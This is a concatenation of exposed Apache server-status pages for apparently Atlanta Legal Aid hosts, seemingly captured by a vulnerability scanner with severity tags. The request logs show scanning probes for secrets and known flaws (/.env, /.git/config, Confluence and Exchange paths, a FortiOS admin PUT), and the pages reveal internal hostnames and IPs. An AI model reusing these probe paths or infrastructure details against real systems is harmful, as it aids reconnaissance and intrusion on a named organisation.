70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 23-34-0/0/8381. 0.00000.00.00343.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-34-0/0/8527. 0.00485400.00.00285.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-34-0/0/4730. 0.01484900.00.00184.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-34-0/0/3247. 0.00485300.00.0086.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-34-0/0/3898. 0.36264200.00.00138.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-34-0/0/2776. 0.00484800.00.0087.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-34-0/0/2982. 0.00483700.00.00106.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-34130072/93/4242K 3.49025647.32.02127.20 70.132.4.67http/1.1survey.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 31-34-0/0/2550. 2.1626100.00.00100.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-34-0/0/2993. 0.00485000.00.00116.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-34-0/0/2838. 0.00485100.00.0092.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-34-0/0/2627. 0.17414900.00.0089.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-34-0/0/3320. 0.00484600.00.00112.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-34-0/0/3280. 1.42485600.00.00138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-34-0/0/3039. 0.01484500.00.0094.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-34-0/0/2618. 0.00484700.00.0091.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-34-0/0/2981. 0.16414800.00.00101.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-34-0/0/1908. 0.00980700.00.0070.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-34-0/0/478. 0.00978100.00.0022.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-34-0/0/443. 0.00980000.00.0020.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-34-0/0/157. 0.00980100.00.002.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-34-0/0/289. 0.00979900.00.0014.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-34-0/0/233. 0.00977900.00.0016.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-34-0/0/196. 0.00979800.00.009.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-34-0/0/153. 0.00977800.00.001.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-34-0/0/112. 0.23870800.00.002.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-34-0/0/278. 0.00977700.00.008.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-34-0/0/428. 0.00977300.00.0010.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-34-0/0/111. 0.00977400.00.002.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-34-0/0/192. 0.00977600.00.0032.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-34-0/0/203. 0.00977500.00.0013.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-34-0/0/279. 0.00977100.00.0015.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-34-0/0/73. 0.00977200.00.000.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-34-0/0/99. 0.00982900.00.002.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 57-34-0/0/124. 0.06
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0210fb2b530
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:05 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 24 seconds Server load: 2.50 0.54 0.17 Total accesses: 5117161 - Total Traffic: 242.1 GB CPU Usage: u33.23 s4.24 cu0 cs0 - .000378% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 115 requests currently being processed, 0 idle workers WWWWWWWWWWKWWWWWWWWWWWWWWKKWWWWWKWWWWWWKWWWWWWWWWWWWWWKWKWWWWWKW WKWWWKWKWWWWWWWKKWKKWKWKWKWWWKKWWWWWWWWWWWWWWWWWWSWSWS.......... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208261/1/315813W 0.18300.90.0015274.52 130.176.208.180http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 1-114208364/4/307281W 0.083044.60.0415603.86 130.176.208.148http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 2-114202774/11/296200W 0.3010231.70.4714399.66 130.176.208.180http/1.1events.alas.org:8080GET /server-status HTTP/1.1 3-114202782/9/291720W 0.2810229.60.2414074.69 130.176.208.148http/1.1events.alas.org:8080GET / HTTP/1.1 4-114202875/16/280071W 0.173050.20.0714108.13 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-114208370/0/270950W 0.00400.00.0013303.78 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 6-114208466/6/257849W 0.140072.60.0712980.21 130.176.208.180http/1.1events.alas.org:8080GET /login.action HTTP/1.1 7-114203472/10/249542W 0.2920229.60.2412283.25 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 8-114208472/2/236970W 0.092042.50.0411522.06 130.176.208.180http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 9-114208481/1/226037W 0.00301.00.0011118.77 130.176.208.180http/1.1atlantalegalaid.org:8080GET /s/31332e33322e39392e3335/_/;/META-INF/maven/com.atlassian. 10-114200193/29/214612K 2.14003.61.4710231.81 130.176.208.180http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 11-114208490/1/192016W 0.18000.00.009331.32 130.176.208.138http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 12-114203640/4/176706W 0.01600.00.018770.57 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 13-114208752/2/168047W 0.07106.90.018058.75 130.176.208.138http/1.1atlantalegalaid.org:8080GET /.DS_Store HTTP/1.1 14-114208762/2/156064W 0.080011.80.017530.90 130.176.208.148http/1.1elearning.alas.org:8080GET / HTTP/1.1 15-114203841/4/149535W 0.263032.10.147254.50 130.176.208.180http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 16-114203854/7/134165W 0.460066.80.166324.95 130.176.208.180http/1.1events.alas.org:8080GET /v2/_catalog HTTP/1.1 17-114196100/77/112407W 7.72000.01.685336.09 130.176.208.138http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 18-114208772/2/103350W 0.00202.10.005128.80 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-114199130/51/93817W 2.96000.02.624748.71 130.176.208.180http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 20-114208782/2/93899W 0.00106.90.014523.83 130.176.208.148http/1.1survey.alas.org:8080GET /about HTTP/1.1 21-114208791/3/86192W 0.08105.90.014051.44 130.176.208.180http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 22-114204012/5/84817W 0.3610234.40.254104.91 130.176.208.180http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 23-114204061/3/79166W 0.253032.10.103708.97 130.176.208.180http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 24-114208802/2/71768W 0.01105.60.013443.05 130.176.208.180http/1.1events.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 25-114204246/8/38026K 0.410084.30.221723.77 130.176.208.138http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 26-114204255/7/30105K 0.390081.50.091388.64 130.176.208.138http/1.1on.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 27-114204300/4/27631W 0.59000.00.091253.80 130.176.208.148http/1.1esign.alas.org:8080GET / HTTP/1.1 28-114204358/10/25408W 0.092013.70.021161.23 130.176.208.180http/1.1events.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 29-114200924/23/23708W 1.641080.34.741038.57 130.176.208.180http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 30-114204406/8/25345W 0.400037.90.041138.81 130.176.208.180http/1.1events.alas.org:8080GET /config.json HTTP/1.1 31-114208812/2/23301W 0.01102.50.001016.81 130.176.208.148http/1.1survey.alas.org:8080GET / HTTP/1.1 32-114208824/5/24127K 0.09004.40.041138.34 130.176.208.180http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 33-114209221/1/23755W 0.00101.00.001123.81 130.176.208.180http/1.1events.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-114204525/7/24933W 0.103045.80.051086.46 130.176.208.180http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 35-114204619/11/26412W 0.191055.60.061149.01 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-114204623/5/22943W 0.391045.40.061008.31 130.176.208.180http/1.1atlantalegalaid.org:8080GET /server-status HTTP/1.1 37-114209231/1/23494W 0.00101.20.001057.31 130.176.208.138http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 38-114204673/5/23017W 0.243034.20.051015.32 130.176.208.180http/1.1events.alas.org:8080GET /s/31332e33322e39392e3932/_/;/META-INF/maven/com.atlassian. 39-114209243/3/22433K 0.00003.10.00936.86 130.176.208.148http/1.1on.alas.org:8080GET /about HTTP/1.1 40-114204726/8/23689W 0.350078.60.10997.74 130.176.208.148http/1.1events.alas.org:8080GET /config.json HTTP/1.1 41-114204770/3/4958W 0.03600.00.02210.14 130.176.208.138http/1.1intranet.alas.org:8080GET / HTTP/1.1 42-114209250/0/2822W 0.00100.00.00108.29 130.176.208.138http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 43-114204872/4/3165W 0.243033.20.08137.28 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 44-114205046/8/1989W 0.192016.40.02129.48 130.176.208.180http/1.1events.alas.org:8080GET /.env HTTP/1.1 45-114205054/6/1930W 0.18204.50.0495.15 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 46-114209260/0/1812W 0.00100.00.0048.06 130.176.208.148http/1.1intranet.alas.org:8080GET / HTTP/1.1 47-114205156/8/1941W 0.261056.60.0684.48 130.176.208.180http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 48-114209270/2/1564W 0.09000.00.0452.66 130.176.208.148http/1.1esign.alas.org:8080GET / HTTP/1.1 49-114209281/1/1459W 0.00001.10.0055.34 130.176.208.148http/1.1events.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 50-114209294/4/1292W 0.00004.80.0057.45 130.176.208.180http/1.1events.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 51-114209301/1/1483W 0.00101.10.0057.39 130.176.208.138http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02141f9a982
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:02 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 21 seconds Server load: 2.50 0.54 0.17 Total accesses: 5116987 - Total Traffic: 242.1 GB CPU Usage: u31.38 s3.79 cu0 cs0 - .000355% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 65 requests currently being processed, 0 idle workers WWKKWWKKKWWWWKWWWWSWSSKWSWKWKKWSW.WKK.W.WW.WKW.K....W.KWWWKWKW.W ...W.KKWKWWWKW......K.K...WW........K...K..W.................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208261/1/315813W 0.18000.90.0015274.52 130.176.208.180http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 1-114208364/4/307281W 0.080044.60.0415603.86 130.176.208.148http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 2-114202771/8/296197K 0.3003146228.60.4614399.66 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 3-114202781/8/291719K 0.2803188228.60.2414074.69 130.176.208.148http/1.1events.alas.org:8080GET / HTTP/1.1 4-114202875/16/280071W 0.170050.20.0714108.13 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 5-114208370/0/270950W 0.00200.00.0013303.78 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 6-114208461/1/257844K 0.09091441.30.0412980.18 130.176.208.180http/1.1survey.alas.org:8080GET / HTTP/1.1 7-114203472/10/249542K 0.2900229.60.2412283.25 130.176.208.180http/1.1events.alas.org:8080GET /.git/config HTTP/1.1 8-114208471/1/236969K 0.09090241.30.0411522.06 130.176.208.180http/1.1survey.alas.org:8080GET / HTTP/1.1 9-114208481/1/226037W 0.00001.00.0011118.77 130.176.208.180http/1.1atlantalegalaid.org:8080GET /s/31332e33322e39392e3335/_/;/META-INF/maven/com.atlassian. 10-114200193/20/214603W 1.960034.31.3810231.72 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 11-114208490/0/192015W 0.00100.00.009331.32 130.176.208.180http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-114203640/4/176706W 0.01300.00.018770.57 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 13-114208751/1/168046K 0.00001.10.008058.75 130.176.208.138http/1.1short.alas.org:8080GET /s/31332e33322e39392e3932/_/;/META-INF/maven/com.atlassian. 14-114208760/0/156062W 0.67000.00.007530.89 130.176.208.148http/1.1short.alas.org:8080GET /server-status HTTP/1.1 15-114203841/4/149535W 0.260032.10.147254.50 130.176.208.180http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 16-114203853/6/134164W 0.240034.30.136324.92 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 17-114196100/68/112398W 7.18300.01.665336.07 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-114208770/0/103348S 0.00400.00.005128.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-114199137/50/93816W 2.790055.72.534748.63 130.176.208.180http/1.1events.alas.org:8080PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 20-114208780/0/93897S 0.00700.00.004523.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-114208790/0/86189S 0.01900.00.004051.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-114204011/4/84816K 0.2803343228.60.244104.90 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 23-114204061/3/79166W 0.250032.10.103708.97 130.176.208.180http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 24-114208800/0/71766S 0.00500.00.003443.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-114204243/5/38023W 0.181049.70.181723.73 130.176.208.138http/1.1elearning.alas.org:8080GET / HTTP/1.1 26-114204252/4/30102K 0.31064838.00.051388.60 130.176.208.138http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 27-114204300/3/27630W 0.06300.00.091253.80 130.176.208.148http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-114204357/9/25407K 0.090012.70.021161.23 130.176.208.180http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 29-114200923/22/23707K 1.550139.04.701038.53 130.176.208.180http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 30-114204404/6/25343W 0.18004.40.011138.77 130.176.208.180http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-114208810/0/23299S 0.00800.00.001016.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-114208820/0/24122W 0.00000.00.001138.30 130.176.208.144http/1.1survey.alas.org:8080GET / HTTP/1.1 33-114-0/0/23754. 0.002500.00.001123.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-114204525/7/24933W 0.100045.80.051086.46 130.176.208.180http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 35-114204616/8/26409K 0.18076152.00.061149.00 130.176.208.180http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 36-114204622/4/22942K 0.31078837.90.051008.30 130.176.208.180http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 37-114-0/0/23493. 1.932400.00.001057.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-114204673/5/23017W 0.240034.20.051015.32 130.176.208.180http/1.1events.alas.org:8080GET /s/31332e33322e39392e3932/_/;/META-INF/maven/com.atlassian. 39-114-0/0/22430. 1.552300.00.00936.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-114204725/7/23688W 0.110046.10.07997.71 130.176.208.148http/1.1elearning.alas.org:8080GET / HTTP/1.1 41-114204770/3/4958W 0.03300.00.02210.14 130.176.208.138http/1.1intranet.alas.org:8080GET / HTTP/1.1 42-114-0/0/2822. 0.00300.00.00108.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114204872/4/3165W 0.240033.20.08137.28 130.176.208.180http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 44-114205045/7/1988K 0.19076915.40.02129.48 130.176.208.180http/1.1survey.alas.org:8080GET /about HTTP/1.1 45-114205054/6/1930W 0.18004.50.0495.15 130.176.208.180http/1.1events.alas.org:8080GET / HTTP/1.1 46-114-0/0/1812. 0.001900.00.0048.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-114205155/7/1940K 0.18050850.80.0584.48 130.176.208.180http/1.1survey.alas.org:8080GET /about HTTP/1.1 48-114-0/0/1562. 0.001700.00.0052.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-114-0/0/1458. 0.001800.00.0055.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-114-0/0/1288. 0.001600.00.0057.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-114-0/0/1482. 0.001500.00.0057.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-114205320/3/1868W 0.12300.00.0151.05 130.176.208.180http/1.1intranet.alas.org:8080GET / HTTP/1.1 53-114-0/0/1209. 0.001400.00.0043.63 ::1http/1.1atlantalegalaid.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021ef4bdd7c
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:05:55 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 14 seconds Server load: 4.64 0.98 0.31 Total accesses: 2348124 - Total Traffic: 111.6 GB CPU Usage: u45.05 s5.35 cu0 cs0 - .00107% CPU load .497 requests/sec - 24.8 kB/second - 49.9 kB/request 105 requests currently being processed, 0 idle workers KKWWKWKKWWWWWKWKWWWWWKWWKKKKWKKWKWWWWWWWWWWWWWWKWKKWKKWWWWWWWWWK WKWWKWKKKWWKKKKKKKWWKWKKKKKKWKKWKKKKKWKKK....................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284399/10/149113K 1.050042.70.117129.89 70.132.63.132http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 1-54282743/22/146311K 0.700043.60.477406.38 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 2-54282795/19/138687W 2.17108.80.376786.81 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 3-54284440/2/138058W 0.49100.00.006843.67 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 4-54284514/4/132813K 1.1803541232.10.236872.41 70.132.63.132http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-54277790/74/127549W 5.68200.01.886305.79 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 6-54284278/11/123206K 1.970041.30.156154.80 70.132.63.132http/1.1secure.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-54279606/54/116762K 5.530050.81.125991.82 70.132.63.132http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 8-54284282/6/111210W 1.93302.00.015413.77 70.132.63.132http/1.1intranet.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 9-54284528/8/109799W 0.5310113.60.115360.51 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-54284613/3/103116W 0.433066.60.074844.78 70.132.63.132http/1.1intranet.alas.org:8080GET /server-status HTTP/1.1 11-54284626/6/90825W 0.241038.70.044417.10 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-54284634/4/81748W 0.471044.80.044061.24 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 13-54283944/9/76024K 1.21005.60.023612.14 70.132.63.132http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 14-54277906/74/71384W 5.783047.53.213477.89 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 15-542846410/10/68078K 0.300079.40.083513.42 70.132.63.132http/1.1secure.alas.org:8080GET /.DS_Store HTTP/1.1 16-54284811/1/58812W 0.213032.10.032692.83 70.132.63.132http/1.1intranet.alas.org:8080GET /telescope/requests HTTP/1.1 17-54283050/14/48131W 1.34200.00.462319.79 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-54284821/1/44101W 0.00301.00.002305.00 70.132.63.132http/1.1intranet.alas.org:8080GET /.DS_Store HTTP/1.1 19-54284830/3/40557W 0.69000.00.211989.78 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 20-54284881/1/41156W 0.00301.00.002010.74 70.132.63.132http/1.1intranet.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 21-54284897/7/35249K 0.20009.80.011733.90 70.132.63.132http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 22-54284901/1/38395W 0.00301.40.001750.94 70.132.63.132http/1.1intranet.alas.org:8080GET /.env HTTP/1.1 23-54284911/1/34535W 0.6810228.60.221616.61 70.132.63.132http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-54284926/6/31221K 0.110124052.60.051522.00 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 25-54285216/6/16888K 0.090047.70.05728.46 70.132.63.132http/1.1secure.alas.org:8080GET /info.php HTTP/1.1 26-54285226/6/11330K 0.100049.80.05570.89 70.132.63.132http/1.1secure.alas.org:8080GET /.env HTTP/1.1 27-54285236/6/11704K 0.01006.30.01472.32 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 28-54285240/0/9875W 0.00300.00.00430.06 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-54285253/3/9778K 0.240038.80.04403.59 70.132.63.132http/1.1on.alas.org:8080GET /.env HTTP/1.1 30-54285263/3/10665K 0.240143.10.04492.75 70.132.63.132http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 31-54285272/2/9051W 0.240034.40.03376.41 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 32-54285282/2/10169K 0.08012337.30.01452.29 70.132.63.80http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 33-54285331/1/10592W 0.00301.00.00457.74 70.132.63.132http/1.1intranet.alas.org:8080GET /login.action HTTP/1.1 34-54285341/1/10172W 0.00301.00.00466.71 70.132.63.132http/1.1intranet.alas.org:8080GET /config.json HTTP/1.1 35-54285590/0/10772W 0.00300.00.00445.08 70.132.63.80http/1.1events.alas.org:8080GET / HTTP/1.1 36-54285680/0/9039W 0.00300.00.00379.18 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-54285690/0/10086W 0.00300.00.00404.90 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 38-54285701/1/8215W 0.00101.00.00401.48 70.132.63.80http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 39-54285910/0/9918W 0.00300.00.00383.60 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 40-54285923/3/10174W 0.19004.30.00360.69 70.132.63.165http/1.1survey.alas.org:8080GET / HTTP/1.1 41-54286010/0/2149W 0.00200.00.0078.67 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-54286020/0/1042W 0.00200.00.0040.24 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 43-54286030/0/1034W 0.00200.00.0044.98 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 44-54286040/0/631W 0.00200.00.0071.13 70.132.63.165http/1.1events.alas.org:8080GET / HTTP/1.1 45-54286050/0/987W 0.00200.00.0052.93 70.132.63.165http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-54286061/1/683W 0.00101.10.0017.14 70.132.63.132http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 47-54286072/2/1011K 0.090042.40.0446.80 70.132.63.132http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 48-54286080/0/685W 0.00200.00.0020.87 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 49-54286092/2/696K 0.090042.30.0421.45 70.132.63.132http/1.1on.alas.org:8080GET /config.json HTTP/1.1 50-54286106/6/629K 0.00006.30.0128.44 70.132.63.132http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 51-54286432/2/740W 0.050028.40.0327.28 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 52-54286484/4/683K 0.05062631.40.0321.07 70.132.63.132http/1.1on.alas.org:8080GET /info.php HTTP/1.1 53-54286495/5/499K 0.02007.80.01
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0212f56a141
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:05:57 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 16 seconds Server load: 4.64 0.98 0.31 Total accesses: 2348254 - Total Traffic: 111.6 GB CPU Usage: u46.64 s5.59 cu0 cs0 - .0011% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 150 requests currently being processed, 0 idle workers KKKWKWKKWWWKKKWKWWWWKKKWWKKKWKKKKWWWWWWWKKWWWWWKWKKWKKWWKWWWWKWW WWWWKKKKKKWKKKKWKWWWKKKKKKKKKKKWKKKKKWKKKWWKWWKWKWWWWWWWWWWWKKWK KKKKKWWKKWWKWWWKWWKWKW Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-542843911/12/149115K 1.051044.90.117129.90 70.132.63.132http/1.1elearning.alas.org:8080GET /config.json HTTP/1.1 1-54282744/23/146312K 0.7218344.80.477406.38 70.132.63.132http/1.1esign.alas.org:8080GET / HTTP/1.1 